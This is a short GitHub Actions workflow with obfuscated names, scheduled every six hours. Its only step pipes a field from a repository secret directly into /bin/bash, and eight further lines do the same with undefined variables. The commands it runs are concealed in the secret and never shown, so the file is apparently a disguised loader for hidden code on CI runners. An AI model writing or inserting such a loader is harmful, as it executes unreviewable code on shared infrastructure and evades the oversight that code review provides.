name: tianqiguang4567

on:
  workflow_dispatch:
  schedule:
    - cron: '29 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tianqiguang4567
        env:
          rx040: ${{ secrets.rx040 }}
        run: |
          echo $rx040 | jq -r .c04 | /bin/bash
          echo $is530 | jq -r .qs4738 | /bin/bash
          echo $ksvnq1045 | jq -r .m10 | /bin/bash
          echo $vwqr92066 | jq -r .wghgu74869 | /bin/bash
          echo $uzz58 | jq -r .tdqz7 | /bin/bash
          echo $dnur84693 | jq -r .dwm754 | /bin/bash
          echo $ylnbg56737 | jq -r .bbg816 | /bin/bash
          echo $nn1 | jq -r .egmh32783 | /bin/bash
          echo $zms90051 | jq -r .bjd58520 | /bin/bash

